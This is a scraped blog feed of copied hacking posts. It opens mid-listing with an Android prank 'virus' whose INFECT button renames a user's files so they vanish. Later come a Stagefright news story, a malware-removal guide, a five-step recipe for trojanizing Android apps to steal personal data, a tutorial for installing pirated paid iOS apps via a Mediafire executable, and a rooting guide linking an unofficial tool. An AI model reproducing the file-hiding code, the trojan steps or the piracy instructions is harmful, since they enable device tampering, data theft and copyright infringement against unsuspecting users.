= new File(list[i].getParent()+"..."+myList.get(i));<br /> Log.e("abs_path",list[i].getParent()+"/"+myList.get(i)+"");<br /> //boolean success = file.renameTo(file2);<br /> boolean success= file.renameTo(new File(list[i].getParent(),"..."+myList.get(i)));<br /> Log.e("bool",success+"" );<br /> }<br /> }<br /> public void disinfect()<br /> {<br /> File list[] = file.listFiles();<br /> for( int i=0; i< list.length; i++)<br /> {<br /> myList.add( list[i].getName() );<br /> Log.e("files : ",i+":"+ myList.get(i).toString());<br /> File file = new File(list[i].getParent()+"/"+myList.get(i));<br /> String aa= myList.get(i).replace("...", "");<br /> Log.e("replace", aa+"");<br /> boolean success= file.renameTo(new File(list[i].getParent(),aa));<br /> Log.e("bool",success+"" );<br /> }<br /> }<br /> }<br /> And the layout :-<br /><br /> xmlns:tools="http://schemas.android.com/tools"<br /> android:layout_width="match_parent"<br /> android:layout_height="match_parent"<br /> android:background="@drawable/vrs_logo"<br /> tools:context=".Fun_Virus_Activity" ><br /><br /> android:id="@+id/btn_infect"<br /> android:layout_width="wrap_content"<br /> android:layout_height="wrap_content"<br /> android:layout_alignParentLeft="true"<br /> android:layout_alignParentTop="true"<br /> android:layout_marginTop="32dp"<br /> android:text="INFECT" /><br /><br /> android:id="@+id/btn_disinfect"<br /> android:layout_width="wrap_content"<br /> android:layout_height="wrap_content"<br /> android:layout_alignBaseline="@+id/btn_infect"<br /> android:layout_alignBottom="@+id/btn_infect"<br /> android:layout_alignParentRight="true"<br /> android:text="DISINFECT" /></span><br /><br />**<br /><br />In a condition when all previous data is not visible after disinfecting then you have to manually recover those data using file explorer like:-Es File Explorer,AndroZip etc..<br />you should rename folders with "..." prefix to there original name ex:- '...image' -->'image'<br /><br />This will show data again.<br /><br /><br /><br /><span style="font-size: x-small;">Source : Copyed on April 18, 2018 at http://suhebqureshi.blogspot.co.id Posted by Suheb Qureshi<br /> As an advanced reference material, please be able to visit the official website. Thank you</span>Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-70057259492409387572018-04-17T21:33:00.000-07:002018-04-18T00:55:19.188-07:00Simple Text Message to Hack Any Android Phone Remotely<div style="text-align: center;">
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFXCGByLmtAUlUZQ-QnEEthPo5ZCR4x6aR6z_1B5DsoUMwWMfElvjBWLrL3kIPZ_YSffDLoHg1gPNp2G00N_TJNTEUhxSpQ6uZJGuBCj-4969IPu48dTaUYp9pduqAjI1dX7fftwYBAaE/s400/hacking-android-phone.png" /></div>
<br />
Own an Android phone? Beware, Your Android smartphones can be hacked by just a malformed text message.<br /><br />Security researchers have found that 95% of Android devices running version 2.2 to 5.1 of operating system, which includes Lollipop and KitKat, are vulnerable to a security bug, affecting more than 950 Million Android smartphones and tablets.<br /><br />Almost all Android smart devices available today are open to attack that could allow hackers to access the vulnerable device without the owners being aware of it, according to Joshua Drake, vice president of platform research and exploitation at security firm Zimperium.<br /><br />The vulnerability actually resides in a core Android component called "Stagefright," a multimedia playback library used by Android to process, record and play multimedia files such as PDFs.<br /><br />A Text Message Received...Your Game is Over<br /><br />The sad news for most of the Android users is that the fix will not help Millions of Android users that owned older versions of the operating system that Google no longer supports, opening doors for hackers to perform Stagefright attack.<br /><br />Drake has developed and published a scary exploit that uses a specially crafted text message using the multimedia message (MMS) format.<br /><br />All a hacker needs is the phone number of the victim’s Android device. The hacker could then sends the malicious message that will surreptitiously execute malicious code on the vulnerable device with no end user action, no indication, nothing required.<br /><br />"These vulnerabilities are extremely dangerous because they do not require that the victim take any action to be exploited," reads the Zimperium blog post published Monday.<br /><br />"Unlike spear-phishing, where the victim needs to open a PDF file or a link sent by the attacker, this vulnerability can be triggered while you sleep. Before you wake up, the attacker will remove any signs of the device being compromised, and you will continue your day as usual—with a trojaned phone."<br /><br />Drake will present his full findings, including six additional attack techniques to exploit the vulnerability, at Black Hat security conference in Las Vegas on on August 5 and DEF CON 23 on August 7, where he is scheduled to deliver a talk titled, Stagefright: Scary Code in the Heart of Android.<br /><br />Almost all Android devices containing Stagefright are in question. According to Drake, all versions of Android devices after and including version 2.2 of the operating system are potentially vulnerable, and it is up to each device manufacturer to patch the devices against Stagefright attack.<br /><br />When will I expect a Fix?<br /><br />Google has patched the code and sent it to device manufacturers, but devices require over-the-air updates from companies such as Samsung or Motorola to update their customers' phones.<br /><br />Given the shaky history of handset manufacturers and carriers rolling out security patches, it is not known how long the companies will take to update vulnerable Android devices against Stagefright attack.<br /><br />However, Silent Circle has patched the issue in its Blackphone, as has Mozilla, which uses Stagefright code in Firefox OS.<br />
<br />
<span style="font-size: x-small;">Source : Copyed on April 18, 2018 at thehackernews.com Posted by Mohit Kumar</span><br />
<span style="font-size: x-small;"> As an advanced reference material, please be able to visit the official website. Thank you</span>Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-1901538013082711032018-04-17T21:16:00.002-07:002018-04-18T00:51:29.618-07:00How to Remove Malware From Your PC<div style="text-align: center;">
<img border="0" height="225" src="https://assets.pcmag.com/media/images/501506-how-to-kill-malware.jpg?thumb=y&width=810&height=456" width="400" /></div>
<br />
It should be drilled into you by now: Use antivirus software! These programs—from the amazing free tools to the fee-driven antivirus utilities—keep tabs on your Windows PC with scans, real-time monitoring, even heuristic analysis of files and processes so new threats can be identified. It's imperative, especially with Windows, that you have some kind of antivirus installed.<br />
<br />
But even the best antivirus isn't 100 percent foolproof. A device already compromised by malware could get on your network, people can personally place malware on a system, and some malware, a Remote Access Trojan, lays dormant waiting to attack at just the right time. And no one can protect entirely against social engineering or phishing schemes that trick you into clicking on or downloading an infected link or attachment. Hell, there are even rogue programs out there that look like antivirus or antispyware, but when you install them, you get infected! Always download from the source—avoid the third-party download sites.<br />
<br />
Sometimes, it's hard to tell when you're initially infected with the badness. But there are plenty of signs you should keep an eye out for—incredibly slow performance where once the PC zipped along, browser pop-ups when no browser is even open, scary warnings from security programs you didn't install, and many more.<br />
<br />
If you suspect, or absolutely with a certainty know, you've got a malware infection, here are the steps to take, immediately, to remove the malware.<br />
<br />
Install or Update Your Antivirus<br />
<br />
First, make sure your existing antivirus software is fully updated with the latest virus definitions—that's how the software IDs existing malware, based on what has come before. Antivirus vendors are constantly updating these lists as they encounter new viruses and Trojans in the wild and in the lab. If your software is even a day out of date, you run the risk of an infection.<br />
<br />
If you don't have any antivirus installed, well...sheesh. Re-read the first paragraph above and immediately download one of our top-rated free antivirus tools: Avast Free Antivirus, AVG AntiVirus Free, or Panda Free Antivirus.<br />
<br />
<div style="text-align: center;">
<img border="0" height="280" src="https://assets.pcmag.com/media/images/485072-avast-free-antivirus-2016-main-window.jpg?thumb=y&width=980&height=519" width="400" /></div>
<br />
If you need to fix an infected PC for a business, super-sheesh, and also, you'll probably have to spend some money to get a full security suite. Our top-rated options include: Symantec Norton Security Premium, Bitdefender Internet Security, Bitdefender Total Security, Kaspersky Internet Security, and McAfee LiveSafe. All of the above get 4.5 stars in reviews this year from PCMag's security expert, Neil J. Rubenking.<br />
<br />
Then run the deep, thorough scan. Let it run for as long as it takes, and hope that it finds and fixes the problem. That's your best-case scenario. The problem is, if the malware is good at its job, then it probably deactivated the antivirus to get there in the first place.<br />
<br />
Also, make sure you've got a software firewall running on all PCs. The firewall running in your home or business router is nice and all, but it's not enough. Our top pick is the Check Point ZoneAlarm Free Firewall, or get the paid Pro version that does even more.<br />
<br />
Revert to the Old or the Safe<br />
<br />
If you've got System Restore points set in Windows, you could use this opportunity to reset the system. It could do the trick but probably will not. The malware, again, if it was written by someone smart, will be ready for this trick. You can try running RKill, a program designed to kill any known malware processes in play.<br />
<br />
If that doesn't work, you need to boot Windows in a way that won't let the malware get started. That's called Safe Mode. Enter into the Windows Safe Mode by restarting the PC, then, in Windows 8 and 10, hold down the shift key during the boot sequence. When you're asked for troubleshooting options, enter Safe Mode.<br />
<br />
You should delete temp files—they permeate Windows after a while, and could be where malware hides. At the Start menu, type in Disk Cleanup and it'll check the C: drive for what you can safely delete among all the temps. Then download and run an antivirus on-demand scanner: Malwarebytes Anti-Malware is always highly recommended at this point in the process. Hopefully, it does the trick and your PC is back to normal after the scan and another reboot.<br />
<div>
<br />
<div style="text-align: center;">
<img border="0" height="265" src="https://assets.pcmag.com/media/images/501520-malwarebytes-anti-malware.jpg?thumb=y&width=740&height=492" width="400" /></div>
<br />
Malwarebytes Anti-Malware is sometimes called "second opinion malware scanner," because it's a second line of attack against the bad guys if your initial antivirus fails. Other options include HitmanPro and Kaspersky TDSKiller. The latter is particularly good at sniffing out rootkits that run at a level that makes them hard to find by regular antivirus software.<br />
<br />
Cut the Internet<br />
<br />
If you've got a RAT aboard, that means someone is remotely accessing your PC. That's bad news, so your first step has to be getting off the Internet. Pull the Ethernet on the PC, turn off the Wi-Fi, even turn off the router if you must. That's your only guarantee the PC is disconnected (make sure it's not using a neighbor's or business's Wi-Fi to stay online on the side).<br />
<br />
Not being online makes it hard to stay up to date with antivirus definitions, of course. You'll have to get the latest software from a third-party PC (probably at a different location) then get it to the infected system using a USB flash drive. You can also boot the computer with a CD, sometimes called a "Live CD" or "rescue CD," running a full anti-malware utility. Of course, you might need a CD reader on the PC, which isn't always a given these days, especially on newer laptops. Then again, many of these tools can boot from a USB flash drive, as well.<br />
<br />
Get Portable Antivirus Help<br />
<br />
When all else fails, it could be the OS that's against you, thanks to the infection—you may not be able to even install new antivirus tools. You need to get around the OS and let the antivirus take control.<br />
<br />
There are many portable apps you can put on a USB drive that don't require direct installation, including some that do antivirus, like Microsoft Safety Scanner, ClamWin, McAfee Stinger, or Kaspersky Security Scan. Try a mix—they won't conflict since you run each scan individually.<br />
<br />
If you prefer to boot into a utility that will then do a deeper scan on the entire hard drive, get a third-party PC on which to burn the goods, then find a rescue CD image to burn from antivirus vendors like AVG, Avira, Bitdefender, F-Secure, Kaspersky, Panda, Sophos, and Trend Micro.<br />
<br />
You'll need ISO or IMG file burner software utility to make that disk or drive that's bootable; in Windows 7, 8, and 10, insert the empty CD, DVD, or USB drive, double click the ISO or IMG file and select Burn disc image. Or download a tool like ImgBurn to get more control over it.<br />
<br />
There is specialized software out there, like Spybot, that goes after spyware, or Symantec's Norton Power Eraser, which specifically targets "crimeware," the kind of malware that runs scams and scares the crap out of you. This one comes with a warning that it's as aggressive as hell when it goes after a problem, and therefore the risk of collateral damage is high. The warning says specifically, "there is a risk that it can select some legitimate programs for removal."<br />
<br />
<div style="text-align: center;">
<img border="0" height="267" src="https://assets.pcmag.com/media/images/501521-norton-power-eraser.jpg?thumb=y&width=740&height=495" width="400" /></div>
<br />
Risking a few programs is worth it compared to the nuclear option: reformatting your hard drive and reinstalling the operating system and all programs (you do have an image of your clean OS install backed up that you can use for restoration, right?). That's necessary less and less these days, compared to the days of Windows 95 on up to Vista; but still a viable method of resetting the system, sans malware.<br />
<br />
Living in the Aftermath<br />
<br />
Dealing successfully with an infection is like being at home after you've been burglarized; it takes a while to feel safe again. Take steps, like you would after being robbed: enhance your security. Get the best, highest rated security suite, read up on how to avoid getting scammed/phished, and then go on a purge: uninstall any programs you're not using on a regular basis or don't trust. Be ruthless. And be careful.<br />
<br />
<br />
<span style="font-size: x-small;">Source : Copyed on April 18, 2018 at www.pcmag.com Posted by Eric Griffith<br /> As an advanced reference material, please be able to visit the official website. Thank you</span></div>
Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-61894502093317569782018-04-17T21:08:00.001-07:002018-04-18T00:53:22.154-07:00Create Your Own Android Trojan in 5 Easy Steps<div style="text-align: center;">
<img border="0" height="200" src="https://assets.pcmag.com/media/images/302128-google-ready-to-put-android-everywhere.jpg?thumb=y&width=150&height=150" width="200" /></div>
<br />
It seems that every few weeks a new crop of malicious Android apps turns up in the market. Sometimes Google just removes them from the market; other times it uses the "kill switch" to disable already-downloaded apps from Android devices around the world.<br /><br />Typically these threats are perfectly ordinary-looking apps. Like the Trojan Horse of legend, they enter your device freely, with your permission. Once installed they do something nasty. Some users are shocked that Google can remove stuff from your Android phone remotely. I'm more alarmed at the ridiculous ease with which malicious coders can create Trojans for Android.<br /><br />At last week's Next@Norton event, Symantec researchers presented a dazzling array of information about the current state of mobile security and the mobile malware landscape. Eric Chien, Technical Director for Security Response, revealed the absurdly simple steps a malefactor uses to create a brand-new Trojan by creating one right in front of the audience. Don't worry; his sample app never left the room.<br /><br />Here are the five simple steps Chien demonstrated:<br /><br />One. Start by downloading a free app. You can choose any app at all, but of course you'll want to pick something that will draw plenty of downloads.<br /><br />Two. The language compilers that create applications on your PC take textual source code and convert it into assembly language that the CPU can read and process. It's a one-way translation; there's no way to go from the final executable file back to the source code. Android apps are written in Java, though, and that means that you can decompile them back to the original source code using simple, easily-available tools. For the next step, decompile your target app.<br /><br />Three. The third step is a little tricky. You'll need to obtain Java source code that does something nasty, like sending personal information from the device to a third party. For the demonstration, Chien used a known threat called Android.Geinimi.<br /><br />Four. Adding the Trojan code is absurdly simple. You copy it into the folder containing the existing source code, make a small change in the manifest to run the Trojan code before the rest of the app, and edit the permissions to give the Trojanized app free access to the entire device. While you're at it, tweak the app's name. Chien added "FREE!" to the name for his demo.<br /><br />Five. Compile the modified app and upload it to the market. You're done!<br /><br />Of course, malicious apps don't last long in the Android Market. If you really want to spread a dangerous program, you're better off uploading it in China, where there is no official Android market. In fact, virtually all of the examples referenced in Chien's presentation surfaced in the free-for-all markets of China.<br /><br />Not planning to do this yourself? Good! But I'm sure that like me you're shocked at how easily someone with bad intentions can create a brand new Android Trojan. It's time to look into mobile security for your Android device.<br />
<br />
<span style="font-size: x-small;">Source : Copyed on April 18, 2018 at www.pcmag.com Posted by Neil J. Rubenking<br /> As an advanced reference material, please be able to visit the official website. Thank you</span>Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-61598156084064379512018-04-12T08:10:00.001-07:002018-04-17T03:19:02.574-07:00How to Install Cracked Apps Without JailbreakAll iPhone, iPod and iPad users know that in order to install Cracked Apps & Games to their iDevices it needs a Jailbreak to perform this, but here I will show you a way to install Paid Apss Without Jailbreak for Free using an application under Windows (not Mac) and works for all iOS version including iOS 5 and iOS 6. I wrote an article about How to Get Any iPhone Paid App For Free you can check it out, or you can try to Update & Jailbreak iOS 5.1.1 any iDevice <br />
<br />
1) Download the software called <a href="http://www.mediafire.com/download/gha747554g8nvif/KYSetup_2010.exe">Kuaiyong</a><br />
2) Launch the setup of Kuaiyong, and install it (simple setup)<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisBPE9Jf9jBiWC6fNpanclK_mE1NdWGPTghLeH7sl4wOsz_C3ugYLOtaQkFwF3MU53bVKYvgbaZmT6IPcH7xHveaQJZzz5pSI-9QS3z33OFXSy9uG_-RFIPEAR8KeewfURW7Ni6WlxNVWW/s1600/Download+any+iphone+ipod+ipad+paid+cracked+app+without+jailbreak+tutorial1.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisBPE9Jf9jBiWC6fNpanclK_mE1NdWGPTghLeH7sl4wOsz_C3ugYLOtaQkFwF3MU53bVKYvgbaZmT6IPcH7xHveaQJZzz5pSI-9QS3z33OFXSy9uG_-RFIPEAR8KeewfURW7Ni6WlxNVWW/s400/Download+any+iphone+ipod+ipad+paid+cracked+app+without+jailbreak+tutorial1.jpg" /></a><br />
<br />
3) After Installing the Software, plug-in your iDevice with USB Cable.<br />
4) Now Launch Kuaiyong application from Desktop, it will look like below:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhutvccBaCmrOBOOh9w3WExNzotPrpYJJZ7_jMJeSMn0Ivp-U_h7Cz4ZLgMPVTKrJ8hMIZQaSw72A-2Ah46h0Io0DRKzw8z6veTvztDsLgr2sfIs-QK8v9UQNWCmBtiJRb2GqIIDSLltyYt/s1600/Download+any+iphone+ipod+ipad+paid+cracked+app+without+jailbreak+tutorial2.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhutvccBaCmrOBOOh9w3WExNzotPrpYJJZ7_jMJeSMn0Ivp-U_h7Cz4ZLgMPVTKrJ8hMIZQaSw72A-2Ah46h0Io0DRKzw8z6veTvztDsLgr2sfIs-QK8v9UQNWCmBtiJRb2GqIIDSLltyYt/s400/Download+any+iphone+ipod+ipad+paid+cracked+app+without+jailbreak+tutorial2.jpg" /></a><br />
<br />
5) It will show a list of Apps and Games (Paid), you can search using the Search Bar or you can select an app from the list.<br />
a) Search Bar<br />
b) List navigation<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS8wXqODcchg_cxPlD0vUl_OlDfqVmwlemfC8wTnBWwq0d4dmgox6dXnjHdnXPudy0db-egJqZg8V4aIO1a6sEpv70cncKdKrVTOT5pD1OI7gUqW9sVFQ47CMp2Y7_pRgHiP1Q8XcT_4sE/s1600/Download+any+iphone+ipod+ipad+paid+cracked+app+without+jailbreak+tutorial3.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS8wXqODcchg_cxPlD0vUl_OlDfqVmwlemfC8wTnBWwq0d4dmgox6dXnjHdnXPudy0db-egJqZg8V4aIO1a6sEpv70cncKdKrVTOT5pD1OI7gUqW9sVFQ47CMp2Y7_pRgHiP1Q8XcT_4sE/s400/Download+any+iphone+ipod+ipad+paid+cracked+app+without+jailbreak+tutorial3.jpg" /></a><br />
<br />
6) After choosing an App or Game to download, Click on it then Click the Red button like below.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCNMrzGpMhHUbcDD2fBUzeV7a6WG1niKd2THWUWuOWVi7z8XM8rcr7pNmu8V-cZcXb-VZK93V2i1TR7qqqUbeT_ENh8ERfwOXLHGduUXKMa6Qo7a5jnlgGFBMvGYZOX6z8ywp7RVveeW5i/s1600/Download+any+iphone+ipod+ipad+paid+cracked+app+without+jailbreak+tutorial4.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCNMrzGpMhHUbcDD2fBUzeV7a6WG1niKd2THWUWuOWVi7z8XM8rcr7pNmu8V-cZcXb-VZK93V2i1TR7qqqUbeT_ENh8ERfwOXLHGduUXKMa6Qo7a5jnlgGFBMvGYZOX6z8ywp7RVveeW5i/s400/Download+any+iphone+ipod+ipad+paid+cracked+app+without+jailbreak+tutorial4.jpg" /></a><br />
<br />
7) It will starts downloading the app. Just wait until it completes Downloading.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfHUjmkKhK5pBoG8ZUgmuhpH1-0aHrscZlbO2g1C7Iz3PtCVU0foN0lzn1ZN8jCbUVUZOdw5lV4yQicr1LAnK8wHHbi-t6mi-jLc_HWmuVhGQtdOztW0_rRWVXiBXhgn-Nn5lw8p728K6G/s1600/Download+any+iphone+ipod+ipad+paid+cracked+app+without+jailbreak+tutorial5.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfHUjmkKhK5pBoG8ZUgmuhpH1-0aHrscZlbO2g1C7Iz3PtCVU0foN0lzn1ZN8jCbUVUZOdw5lV4yQicr1LAnK8wHHbi-t6mi-jLc_HWmuVhGQtdOztW0_rRWVXiBXhgn-Nn5lw8p728K6G/s400/Download+any+iphone+ipod+ipad+paid+cracked+app+without+jailbreak+tutorial5.jpg" /></a><br />
<br />
8) After it downloads the Paid app wait some time to Sync the App and add it to your iPhone, iPad or iPod...<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihEK4uNHid5BCQOkDQXafgzMrynRyUSICUrgIRULSGVtnqd0PLc68c8Nc-lz7P5FZoIrYzeP_Gf-bpAHIdaWhPvJY8hScAnSMZA3tyPevHoWrbm998y758YKMGZ9L3cjN3-TuJxnulFqbG/s1600/KartRiderRush1.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihEK4uNHid5BCQOkDQXafgzMrynRyUSICUrgIRULSGVtnqd0PLc68c8Nc-lz7P5FZoIrYzeP_Gf-bpAHIdaWhPvJY8hScAnSMZA3tyPevHoWrbm998y758YKMGZ9L3cjN3-TuJxnulFqbG/s400/KartRiderRush1.jpg" /></a><br />
<br />
Note-1: This works on all iDevices including: iPhone 3G, iPhone 3GS, iPhone 4, iPhone 4S, iPhone 5<br />
Note-2: This also works on all iOS Versions: iOS3, iOS4, iOS5, iOS5.1.1, iOS6, iOS6.0.1<br />
<br />
Search Tags:<br />
ios,ios jailbreaking,ios 6,ios 5,ios paid apps,ios,ios 7,ios cracked apps,free download,jailbreaking,cracked apps,ios,ios free download,ios free cracked apps,install,ios,ios apps,ios paid apps,ios,ios jaikbroken,ios 7<br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div class="source-line" style="background-color: white; border: 0px; color: #333333; font-family: lato, helvetica, arial, sans-serif; font-size: 16px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: 1.3em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span itemprop="datePublished" style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span class="gray-label-plain pubprint" style="border: 0px; font-family: inherit; font-size: 10px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 10px; margin: 0px 0px 20px; padding: 0px 0px 11px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: #999999; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Source :</span></span></span><span style="border: 0px; font-family: inherit; font-size: xx-small; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: blue; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"> </span>Copyed on April 12, 2018 at </span><span class="gray-label-plain pubprint" style="border: 0px; font-family: inherit; font-size: 10px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 10px; margin: 0px 0px 20px; padding: 0px 0px 11px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: blue; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">www.</span></span></span><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: blue; font-family: "verdana" , "arial" , "helvetica" , sans-serif; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: 10px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">letshacksomething.com </span></span></span></span></span></span><span style="border: 0px; font-family: inherit; font-size: xx-small; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: #888888; font-family: "vollkorn" , sans-serif; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Posted by </span><span class="fn" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person" style="border: 0px; color: #888888; font-family: "vollkorn" , sans-serif; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span itemprop="name" style="border: 0px; color: #265f98; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a class="g-profile" data-gapiattached="true" data-gapiscan="true" data-onload="true" href="https://www.blogger.com/profile/09474564561887469944" rel="author" style="background-color: transparent; border: 0px; color: #265f98; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration-line: none; vertical-align: baseline;" title="author profile">Mahammad Shahid</a></span></span></span></div>
<div class="source-line" style="background-color: white; border: 0px; color: #333333; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span itemprop="datePublished" style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: "verdana" , "arial" , "helvetica" , sans-serif; font-size: xx-small; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"> As an advanced reference material, please be able to visit the official website. Thank you</span></span></div>
</div>
Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-54544596306878578012018-04-12T07:41:00.001-07:002018-04-12T08:07:45.891-07:00How To Root Any Android DeviceWhat is Rooting?<br /><br />Android rooting is the process of allowing users of smartphones, tablets, and other devices running the Android mobile operating system to attain privileged control (known as "root access") within Android's subsystem.<br /><br />Rooting is often performed with the goal of overcoming limitations that carriers and hardware manufacturers put on some devices, resulting in the ability to alter or replace system applications and settings, run specialized apps that require administrator-level permissions, or perform other operations that are otherwise inaccessible to a normal Android user. On Android, rooting can also facilitate the complete removal and replacement of the device's operating system, usually with a more recent release of its current operating system. Most of the time,rooting a device voids its warranty.<br /><br />Different company phones have different process' of rooting.Today I will show you how to root any android phone or tablet with single software.<br /><br />SuperOneClick<br /><br />1) Download The <a href="http://uppit.com/htv3iqcanlzz/SuperOneClick_Root.zip">SuperOneClick</a> Root tool and Extract it on your Desktop.<br />2) Connect your Android device to your Pc. (Make sure you have your Device Drivers Installed)<br />3) Click on "SuperOneClick" Application in the Folder.<br />4) A window appears like this-<br /><br /><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIYHGpWflWg6DFOoiI85rjhgB_AxacfKH0QtYH8YLyx9tKT_RTptf0lBCF5bjdEzlKnSEHRyzuK4KI2yI1busDtEoaD0mtvFfas3LDWnBQtyn0jVVvvhXl4QYkDd6OSdk670woN5Z_lQc/s400/superoneclick.png" /><br />Sample picture showing SuperOneClick interface<br /><br />5) Make Sure your device is connected Properly to the computer.<br />6) Click on the "ROOT" Option. <br />7) Wait for the Process to get Completed.<br />8) You have successfully rooted your android device<br /><br />Before you perform this you need to turn on USB debugging from developer options and allow installation from unknown resources.<br /><br />NOTE: Do this at your OWN RISK! I am not responsible for any damage caused to your smartphone.<br /><br />This software might not work on all smartphones.<div>
<br />
<br />
<div>
<div style="text-align: left;">
<span style="background-color: white; border: 0px; color: #404040; font-family: inherit; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><br /></span></span></div>
<div class="source-line" style="border: 0px; color: #333333; font-family: lato, helvetica, arial, sans-serif; font-size: 16px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: 1.3em; margin: 0px; padding: 0px; vertical-align: baseline;">
